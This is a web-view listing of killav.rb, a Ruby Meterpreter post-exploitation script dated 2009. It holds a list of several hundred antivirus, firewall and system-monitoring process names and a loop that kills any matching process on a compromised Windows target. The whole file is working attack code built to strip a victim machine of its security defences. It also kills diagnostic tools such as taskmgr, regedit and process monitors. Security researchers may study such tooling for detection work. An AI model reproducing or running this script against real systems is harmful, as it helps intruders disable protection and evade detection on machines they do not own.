root / scripts / meterpreter / killav.rb @ 7396
History | View | Annotate | Download (8.1 KB)
| 1 | # $Id: killav.rb 7276 2009-10-26 15:14:28Z egypt $
|
|---|---|
| 2 | #
|
| 3 | # Meterpreter script that kills all Antivirus processes
|
| 4 | # Provided by: Jerome Athias <jerome.athias [at] free.fr>
|
| 5 | #
|
| 6 | |
| 7 | @@exec_opts = Rex::Parser::Arguments.new( |
| 8 | "-h" => [ false, "Help menu." ] |
| 9 | ) |
| 10 | def usage |
| 11 | print_line("Usage:" + @@exec_opts.usage) |
| 12 | raise Rex::Script::Completed |
| 13 | end
|
| 14 | |
| 15 | @@exec_opts.parse(args) { |opt, idx, val|
|
| 16 | case opt
|
| 17 | when "-h" |
| 18 | usage |
| 19 | end
|
| 20 | } |
| 21 | |
| 22 | print_status("Killing Antivirus services on the target...")
|
| 23 | |
| 24 | avs = %W{
|
| 25 | AAWTray.exe |
| 26 | Ad-Aware.exe |
| 27 | MSASCui.exe |
| 28 | _avp32.exe |
| 29 | _avpcc.exe |
| 30 | _avpm.exe |
| 31 | aAvgApi.exe |
| 32 | ackwin32.exe |
| 33 | adaware.exe |
| 34 | advxdwin.exe |
| 35 | agentsvr.exe |
| 36 | agentw.exe |
| 37 | alertsvc.exe |
| 38 | alevir.exe |
| 39 | alogserv.exe |
| 40 | amon9x.exe |
| 41 | anti-trojan.exe |
| 42 | antivirus.exe |
| 43 | ants.exe |
| 44 | apimonitor.exe |
| 45 | aplica32.exe |
| 46 | apvxdwin.exe |
| 47 | arr.exe |
| 48 | atcon.exe |
| 49 | atguard.exe |
| 50 | atro55en.exe |
| 51 | atupdater.exe |
| 52 | atwatch.exe |
| 53 | au.exe |
| 54 | aupdate.exe |
| 55 | auto-protect.nav80try.exe |
| 56 | autodown.exe |
| 57 | autotrace.exe |
| 58 | autoupdate.exe |
| 59 | avconsol.exe |
| 60 | ave32.exe |
| 61 | avgcc32.exe |
| 62 | avgctrl.exe |
| 63 | avgemc.exe |
| 64 | avgnt.exe |
| 65 | avgrsx.exe |
| 66 | avgserv.exe |
| 67 | avgserv9.exe |
| 68 | avguard.exe |
| 69 | avgw.exe |
| 70 | avkpop.exe |
| 71 | avkserv.exe |
| 72 | avkservice.exe |
| 73 | avkwctl9.exe |
| 74 | avltmain.exe |
| 75 | avnt.exe |
| 76 | avp.exe |
| 77 | avp.exe |
| 78 | avp32.exe |
| 79 | avpcc.exe |
| 80 | avpdos32.exe |
| 81 | avpm.exe |
| 82 | avptc32.exe |
| 83 | avpupd.exe |
| 84 | avsched32.exe |
| 85 | avsynmgr.exe |
| 86 | avwin.exe |
| 87 | avwin95.exe |
| 88 | avwinnt.exe |
| 89 | avwupd.exe |
| 90 | avwupd32.exe |
| 91 | avwupsrv.exe |
| 92 | avxmonitor9x.exe |
| 93 | avxmonitornt.exe |
| 94 | avxquar.exe |
| 95 | backweb.exe |
| 96 | bargains.exe |
| 97 | bd_professional.exe |
| 98 | beagle.exe |
| 99 | belt.exe |
| 100 | bidef.exe |
| 101 | bidserver.exe |
| 102 | bipcp.exe |
| 103 | bipcpevalsetup.exe |
| 104 | bisp.exe |
| 105 | blackd.exe |
| 106 | blackice.exe |
| 107 | blink.exe |
| 108 | blss.exe |
| 109 | bootconf.exe |
| 110 | bootwarn.exe |
| 111 | borg2.exe |
| 112 | bpc.exe |
| 113 | brasil.exe |
| 114 | bs120.exe |
| 115 | bundle.exe |
| 116 | bvt.exe |
| 117 | ccapp.exe |
| 118 | ccevtmgr.exe |
| 119 | ccpxysvc.exe |
| 120 | cdp.exe |
| 121 | cfd.exe |
| 122 | cfgwiz.exe |
| 123 | cfiadmin.exe |
| 124 | cfiaudit.exe |
| 125 | cfinet.exe |
| 126 | cfinet32.exe |
| 127 | claw95.exe |
| 128 | claw95cf.exe |
| 129 | clean.exe |
| 130 | cleaner.exe |
| 131 | cleaner3.exe |
| 132 | cleanpc.exe |
| 133 | click.exe |
| 134 | cmd.exe |
| 135 | cmd32.exe |
| 136 | cmesys.exe |
| 137 | cmgrdian.exe |
| 138 | cmon016.exe |
| 139 | connectionmonitor.exe |
| 140 | cpd.exe |
| 141 | cpf9x206.exe |
| 142 | cpfnt206.exe |
| 143 | ctrl.exe |
| 144 | cv.exe |
| 145 | cwnb181.exe |
| 146 | cwntdwmo.exe |
| 147 | datemanager.exe |
| 148 | dcomx.exe |
| 149 | defalert.exe |
| 150 | defscangui.exe |
| 151 | defwatch.exe |
| 152 | deputy.exe |
| 153 | divx.exe |
| 154 | dllcache.exe |
| 155 | dllreg.exe |
| 156 | doors.exe |
| 157 | dpf.exe |
| 158 | dpfsetup.exe |
| 159 | dpps2.exe |
| 160 | drwatson.exe |
| 161 | drweb32.exe |
| 162 | drwebupw.exe |
| 163 | dssagent.exe |
| 164 | dvp95.exe |
| 165 | dvp95_0.exe |
| 166 | ecengine.exe |
| 167 | efpeadm.exe |
| 168 | emsw.exe |
| 169 | ent.exe |
| 170 | esafe.exe |
| 171 | escanhnt.exe |
| 172 | escanv95.exe |
| 173 | espwatch.exe |
| 174 | ethereal.exe |
| 175 | etrustcipe.exe |
| 176 | evpn.exe |
| 177 | exantivirus-cnet.exe |
| 178 | exe.avxw.exe |
| 179 | expert.exe |
| 180 | explore.exe |
| 181 | f-agnt95.exe |
| 182 | f-prot.exe |
| 183 | f-prot95.exe |
| 184 | f-stopw.exe |
| 185 | fameh32.exe |
| 186 | fast.exe |
| 187 | fch32.exe |
| 188 | fih32.exe |
| 189 | findviru.exe |
| 190 | firewall.exe |
| 191 | fnrb32.exe |
| 192 | fp-win.exe |
| 193 | fp-win_trial.exe |
| 194 | fprot.exe |
| 195 | frw.exe |
| 196 | fsaa.exe |
| 197 | fsav.exe |
| 198 | fsav32.exe |
| 199 | fsav530stbyb.exe |
| 200 | fsav530wtbyb.exe |
| 201 | fsav95.exe |
| 202 | fsgk32.exe |
| 203 | fsm32.exe |
| 204 | fsma32.exe |
| 205 | fsmb32.exe |
| 206 | gator.exe |
| 207 | gbmenu.exe |
| 208 | gbpoll.exe |
| 209 | generics.exe |
| 210 | gmt.exe |
| 211 | guard.exe |
| 212 | guarddog.exe |
| 213 | hacktracersetup.exe |
| 214 | hbinst.exe |
| 215 | hbsrv.exe |
| 216 | hotactio.exe |
| 217 | hotpatch.exe |
| 218 | htlog.exe |
| 219 | htpatch.exe |
| 220 | hwpe.exe |
| 221 | hxdl.exe |
| 222 | hxiul.exe |
| 223 | iamapp.exe |
| 224 | iamserv.exe |
| 225 | iamstats.exe |
| 226 | ibmasn.exe |
| 227 | ibmavsp.exe |
| 228 | icload95.exe |
| 229 | icloadnt.exe |
| 230 | icmon.exe |
| 231 | icsupp95.exe |
| 232 | icsuppnt.exe |
| 233 | idle.exe |
| 234 | iedll.exe |
| 235 | iedriver.exe |
| 236 | iexplorer.exe |
| 237 | iface.exe |
| 238 | ifw2000.exe |
| 239 | inetlnfo.exe |
| 240 | infus.exe |
| 241 | infwin.exe |
| 242 | init.exe |
| 243 | intdel.exe |
| 244 | intren.exe |
| 245 | iomon98.exe |
| 246 | istsvc.exe |
| 247 | jammer.exe |
| 248 | jdbgmrg.exe |
| 249 | jedi.exe |
| 250 | kavlite40eng.exe |
| 251 | kavpers40eng.exe |
| 252 | kavpf.exe |
| 253 | kazza.exe |
| 254 | keenvalue.exe |
| 255 | kerio-pf-213-en-win.exe |
| 256 | kerio-wrl-421-en-win.exe |
| 257 | kerio-wrp-421-en-win.exe |
| 258 | kernel32.exe |
| 259 | killprocesssetup161.exe |
| 260 | launcher.exe |
| 261 | ldnetmon.exe |
| 262 | ldpro.exe |
| 263 | ldpromenu.exe |
| 264 | ldscan.exe |
| 265 | lnetinfo.exe |
| 266 | loader.exe |
| 267 | localnet.exe |
| 268 | lockdown.exe |
| 269 | lockdown2000.exe |
| 270 | lookout.exe |
| 271 | lordpe.exe |
| 272 | lsetup.exe |
| 273 | luall.exe |
| 274 | luau.exe |
| 275 | lucomserver.exe |
| 276 | luinit.exe |
| 277 | luspt.exe |
| 278 | mapisvc32.exe |
| 279 | mcagent.exe |
| 280 | mcmnhdlr.exe |
| 281 | mcshield.exe |
| 282 | mctool.exe |
| 283 | mcupdate.exe |
| 284 | mcvsrte.exe |
| 285 | mcvsshld.exe |
| 286 | md.exe |
| 287 | mfin32.exe |
| 288 | mfw2en.exe |
| 289 | mfweng3.02d30.exe |
| 290 | mgavrtcl.exe |
| 291 | mgavrte.exe |
| 292 | mghtml.exe |
| 293 | mgui.exe |
| 294 | minilog.exe |
| 295 | mmod.exe |
| 296 | monitor.exe |
| 297 | moolive.exe |
| 298 | mostat.exe |
| 299 | mpfagent.exe |
| 300 | mpfservice.exe |
| 301 | mpftray.exe |
| 302 | mrflux.exe |
| 303 | msapp.exe |
| 304 | msbb.exe |
| 305 | msblast.exe |
| 306 | mscache.exe |
| 307 | msccn32.exe |
| 308 | mscman.exe |
| 309 | msconfig.exe |
| 310 | msdm.exe |
| 311 | msdos.exe |
| 312 | msiexec16.exe |
| 313 | msinfo32.exe |
| 314 | mslaugh.exe |
| 315 | msmgt.exe |
| 316 | msmsgri32.exe |
| 317 | mssmmc32.exe |
| 318 | mssys.exe |
| 319 | msvxd.exe |
| 320 | mu0311ad.exe |
| 321 | mwatch.exe |
| 322 | n32scanw.exe |
| 323 | nav.exe |
| 324 | navap.navapsvc.exe |
| 325 | navapsvc.exe |
| 326 | navapw32.exe |
| 327 | navdx.exe |
| 328 | navlu32.exe |
| 329 | navnt.exe |
| 330 | navstub.exe |
| 331 | navw32.exe |
| 332 | navwnt.exe |
| 333 | nc2000.exe |
| 334 | ncinst4.exe |
| 335 | ndd32.exe |
| 336 | neomonitor.exe |
| 337 | neowatchlog.exe |
| 338 | netarmor.exe |
| 339 | netd32.exe |
| 340 | netinfo.exe |
| 341 | netmon.exe |
| 342 | netscanpro.exe |
| 343 | netspyhunter-1.2.exe |
| 344 | netstat.exe |
| 345 | netutils.exe |
| 346 | nisserv.exe |
| 347 | nisum.exe |
| 348 | nmain.exe |
| 349 | nod32.exe |
| 350 | normist.exe |
| 351 | norton_internet_secu_3.0_407.exe |
| 352 | notstart.exe |
| 353 | npf40_tw_98_nt_me_2k.exe |
| 354 | npfmessenger.exe |
| 355 | nprotect.exe |
| 356 | npscheck.exe |
| 357 | npssvc.exe |
| 358 | nsched32.exe |
| 359 | nssys32.exe |
| 360 | nstask32.exe |
| 361 | nsupdate.exe |
| 362 | nt.exe |
| 363 | ntrtscan.exe |
| 364 | ntvdm.exe |
| 365 | ntxconfig.exe |
| 366 | nui.exe |
| 367 | nupgrade.exe |
| 368 | nvarch16.exe |
| 369 | nvc95.exe |
| 370 | nvsvc32.exe |
| 371 | nwinst4.exe |
| 372 | nwservice.exe |
| 373 | nwtool16.exe |
| 374 | ollydbg.exe |
| 375 | onsrvr.exe |
| 376 | optimize.exe |
| 377 | ostronet.exe |
| 378 | otfix.exe |
| 379 | outpost.exe |
| 380 | outpostinstall.exe |
| 381 | outpostproinstall.exe |
| 382 | padmin.exe |
| 383 | panixk.exe |
| 384 | patch.exe |
| 385 | pavcl.exe |
| 386 | pavproxy.exe |
| 387 | pavsched.exe |
| 388 | pavw.exe |
| 389 | pccwin98.exe |
| 390 | pcfwallicon.exe |
| 391 | pcip10117_0.exe |
| 392 | pcscan.exe |
| 393 | pdsetup.exe |
| 394 | periscope.exe |
| 395 | persfw.exe |
| 396 | perswf.exe |
| 397 | pf2.exe |
| 398 | pfwadmin.exe |
| 399 | pgmonitr.exe |
| 400 | pingscan.exe |
| 401 | platin.exe |
| 402 | pop3trap.exe |
| 403 | poproxy.exe |
| 404 | popscan.exe |
| 405 | portdetective.exe |
| 406 | portmonitor.exe |
| 407 | powerscan.exe |
| 408 | ppinupdt.exe |
| 409 | pptbc.exe |
| 410 | ppvstop.exe |
| 411 | prizesurfer.exe |
| 412 | prmt.exe |
| 413 | prmvr.exe |
| 414 | procdump.exe |
| 415 | processmonitor.exe |
| 416 | procexplorerv1.0.exe |
| 417 | programauditor.exe |
| 418 | proport.exe |
| 419 | protectx.exe |
| 420 | pspf.exe |
| 421 | purge.exe |
| 422 | qconsole.exe |
| 423 | qserver.exe |
| 424 | rapapp.exe |
| 425 | rav7.exe |
| 426 | rav7win.exe |
| 427 | rav8win32eng.exe |
| 428 | ray.exe |
| 429 | rb32.exe |
| 430 | rcsync.exe |
| 431 | realmon.exe |
| 432 | reged.exe |
| 433 | regedit.exe |
| 434 | regedt32.exe |
| 435 | rescue.exe |
| 436 | rescue32.exe |
| 437 | rrguard.exe |
| 438 | rshell.exe |
| 439 | rtvscan.exe |
| 440 | rtvscn95.exe |
| 441 | rulaunch.exe |
| 442 | run32dll.exe |
| 443 | rundll.exe |
| 444 | rundll16.exe |
| 445 | ruxdll32.exe |
| 446 | safeweb.exe |
| 447 | sahagent.exe |
| 448 | save.exe |
| 449 | savenow.exe |
| 450 | sbserv.exe |
| 451 | sc.exe |
| 452 | scam32.exe |
| 453 | scan32.exe |
| 454 | scan95.exe |
| 455 | scanpm.exe |
| 456 | scrscan.exe |
| 457 | serv95.exe |
| 458 | setup_flowprotector_us.exe |
| 459 | setupvameeval.exe |
| 460 | sfc.exe |
| 461 | sgssfw32.exe |
| 462 | sh.exe |
| 463 | shellspyinstall.exe |
| 464 | shn.exe |
| 465 | showbehind.exe |
| 466 | smc.exe |
| 467 | sms.exe |
| 468 | smss32.exe |
| 469 | soap.exe |
| 470 | sofi.exe |
| 471 | sperm.exe |
| 472 | spf.exe |
| 473 | sphinx.exe |
| 474 | spoler.exe |
| 475 | spoolcv.exe |
| 476 | spoolsv32.exe |
| 477 | spyxx.exe |
| 478 | srexe.exe |
| 479 | srng.exe |
| 480 | ss3edit.exe |
| 481 | ssg_4104.exe |
| 482 | ssgrate.exe |
| 483 | st2.exe |
| 484 | start.exe |
| 485 | stcloader.exe |
| 486 | supftrl.exe |
| 487 | support.exe |
| 488 | supporter5.exe |
| 489 | svc.exe |
| 490 | svchostc.exe |
| 491 | svchosts.exe |
| 492 | svshost.exe |
| 493 | sweep95.exe |
| 494 | sweepnet.sweepsrv.sys.swnetsup.exe |
| 495 | symproxysvc.exe |
| 496 | symtray.exe |
| 497 | sysedit.exe |
| 498 | system.exe |
| 499 | system32.exe |
| 500 | sysupd.exe |
| 501 | taskmg.exe |
| 502 | taskmgr.exe |
| 503 | taskmo.exe |
| 504 | taskmon.exe |
| 505 | taumon.exe |
| 506 | tbscan.exe |
| 507 | tc.exe |
| 508 | tca.exe |
| 509 | tcm.exe |
| 510 | tds-3.exe |
| 511 | tds2-98.exe |
| 512 | tds2-nt.exe |
| 513 | teekids.exe |
| 514 | tfak.exe |
| 515 | tfak5.exe |
| 516 | tgbob.exe |
| 517 | titanin.exe |
| 518 | titaninxp.exe |
| 519 | tracert.exe |
| 520 | trickler.exe |
| 521 | trjscan.exe |
| 522 | trjsetup.exe |
| 523 | trojantrap3.exe |
| 524 | tsadbot.exe |
| 525 | tvmd.exe |
| 526 | tvtmd.exe |
| 527 | undoboot.exe |
| 528 | updat.exe |
| 529 | update.exe |
| 530 | upgrad.exe |
| 531 | utpost.exe |
| 532 | vbcmserv.exe |
| 533 | vbcons.exe |
| 534 | vbust.exe |
| 535 | vbwin9x.exe |
| 536 | vbwinntw.exe |
| 537 | vcsetup.exe |
| 538 | vet32.exe |
| 539 | vet95.exe |
| 540 | vettray.exe |
| 541 | vfsetup.exe |
| 542 | vir-help.exe |
| 543 | virusmdpersonalfirewall.exe |
| 544 | vnlan300.exe |
| 545 | vnpc3000.exe |
| 546 | vpc32.exe |
| 547 | vpc42.exe |
| 548 | vpfw30s.exe |
| 549 | vptray.exe |
| 550 | vscan40.exe |
| 551 | vscenu6.02d30.exe |
| 552 | vsched.exe |
| 553 | vsecomr.exe |
| 554 | vshwin32.exe |
| 555 | vsisetup.exe |
| 556 | vsmain.exe |
| 557 | vsmon.exe |
| 558 | vsstat.exe |
| 559 | vswin9xe.exe |
| 560 | vswinntse.exe |
| 561 | vswinperse.exe |
| 562 | w32dsm89.exe |
| 563 | w9x.exe |
| 564 | watchdog.exe |
| 565 | webdav.exe |
| 566 | webscanx.exe |
| 567 | webtrap.exe |
| 568 | wfindv32.exe |
| 569 | whoswatchingme.exe |
| 570 | wimmun32.exe |
| 571 | win-bugsfix.exe |
| 572 | win32.exe |
| 573 | win32us.exe |
| 574 | winactive.exe |
| 575 | window.exe |
| 576 | windows.exe |
| 577 | wininetd.exe |
| 578 | wininit.exe |
| 579 | wininitx.exe |
| 580 | winlogin.exe |
| 581 | winmain.exe |
| 582 | winnet.exe |
| 583 | winppr32.exe |
| 584 | winrecon.exe |
| 585 | winservn.exe |
| 586 | winssk32.exe |
| 587 | winstart.exe |
| 588 | winstart001.exe |
| 589 | wintsk32.exe |
| 590 | winupdate.exe |
| 591 | wkufind.exe |
| 592 | wnad.exe |
| 593 | wnt.exe |
| 594 | wradmin.exe |
| 595 | wrctrl.exe |
| 596 | wsbgate.exe |
| 597 | wupdater.exe |
| 598 | wupdt.exe |
| 599 | wyvernworksfirewall.exe |
| 600 | xpf202en.exe |
| 601 | zapro.exe |
| 602 | zapsetup3001.exe |
| 603 | zatutor.exe |
| 604 | zonalm2601.exe |
| 605 | zonealarm.exe |
| 606 | }
|
| 607 | |
| 608 | client.sys.process.get_processes().each do |x|
|
| 609 | if (avs.index(x['name'].downcase)) |
| 610 | print_status("Killing off #{x['name']}...")
|
| 611 | client.sys.process.kill(x['pid'])
|
| 612 | end
|
| 613 | end
|